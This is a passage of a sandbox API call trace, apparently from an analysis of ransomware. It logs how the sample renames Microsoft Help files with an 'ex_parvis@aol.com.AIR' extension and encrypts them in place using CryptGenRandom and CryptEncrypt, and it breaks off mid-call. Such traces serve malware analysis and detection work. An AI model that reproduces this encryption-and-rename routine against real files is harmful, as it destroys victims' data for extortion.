lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" [0161.299] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.299] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.301] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.301] GetProcessHeap () returned 0x2e0000 [0161.301] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.301] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=338) returned 1 [0161.301] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x152 [0161.301] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.301] GetProcessHeap () returned 0x2e0000 [0161.301] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.301] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.301] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.302] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.302] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.303] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x152, lpOverlapped=0x0) returned 1 [0161.303] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.303] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x152, lpOverlapped=0x0) returned 1 [0161.303] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.303] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.303] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.305] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned 59 [0161.305] GetProcessHeap () returned 0x2e0000 [0161.305] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xdc) returned 0x3ac428 [0161.305] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" [0161.305] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.305] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.307] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.308] GetProcessHeap () returned 0x2e0000 [0161.308] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0161.308] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=350) returned 1 [0161.308] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x15e [0161.308] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.308] GetProcessHeap () returned 0x2e0000 [0161.308] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.308] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.308] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.309] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.310] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.310] ReadFile (in: hFile=0x4d8, lpBuffer=0x30a498, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x15e, lpOverlapped=0x0) returned 1 [0161.310] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.310] WriteFile (in: hFile=0x4d8, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x15e, lpOverlapped=0x0) returned 1 [0161.310] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.310] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.310] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.311] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned 59 [0161.311] GetProcessHeap () returned 0x2e0000 [0161.311] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xdc) returned 0x3ac428 [0161.311] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" [0161.311] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.311] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.316] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.317] GetProcessHeap () returned 0x2e0000 [0161.317] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0161.317] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=350) returned 1 [0161.317] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x15e [0161.317] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.317] GetProcessHeap () returned 0x2e0000 [0161.317] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.317] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.317] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.318] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.318] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.318] ReadFile (in: hFile=0x4d8, lpBuffer=0x30a498, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x15e, lpOverlapped=0x0) returned 1 [0161.318] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.318] WriteFile (in: hFile=0x4d8, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x15e, lpOverlapped=0x0) returned 1 [0161.318] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.318] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.318] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.319] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned 66 [0161.319] GetProcessHeap () returned 0x2e0000 [0161.319] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xea) returned 0x336dd8 [0161.319] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" [0161.319] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.319] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.322] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.322] GetProcessHeap () returned 0x2e0000 [0161.322] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0161.322] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=392) returned 1 [0161.322] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x188 [0161.322] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.322] GetProcessHeap () returned 0x2e0000 [0161.322] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.322] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.322] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.323] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.323] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.323] ReadFile (in: hFile=0x4d8, lpBuffer=0x319788, nNumberOfBytesToRead=0x188, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesRead=0x2acf9c8*=0x188, lpOverlapped=0x0) returned 1 [0161.324] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-392, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.324] WriteFile (in: hFile=0x4d8, lpBuffer=0x32f868*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x32f868*, lpNumberOfBytesWritten=0x2acf9c8*=0x188, lpOverlapped=0x0) returned 1 [0161.324] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.324] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.324] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.324] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned 59 [0161.324] GetProcessHeap () returned 0x2e0000 [0161.324] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xdc) returned 0x3ac428 [0161.324] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" [0161.324] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.324] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.327] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.327] GetProcessHeap () returned 0x2e0000 [0161.327] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0161.327] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=350) returned 1 [0161.327] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x15e [0161.327] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.327] GetProcessHeap () returned 0x2e0000 [0161.327] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.327] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.327] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.328] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.328] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.329] ReadFile (in: hFile=0x4d8, lpBuffer=0x30a498, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x15e, lpOverlapped=0x0) returned 1 [0161.329] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.329] WriteFile (in: hFile=0x4d8, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x15e, lpOverlapped=0x0) returned 1 [0161.329] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.329] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.329] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.329] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned 55 [0161.329] GetProcessHeap () returned 0x2e0000 [0161.329] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x319d30 [0161.329] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" [0161.329] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.329] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.332] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.332] GetProcessHeap () returned 0x2e0000 [0161.332] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.332] GetFileSizeEx (in: hFile=0x4d8, 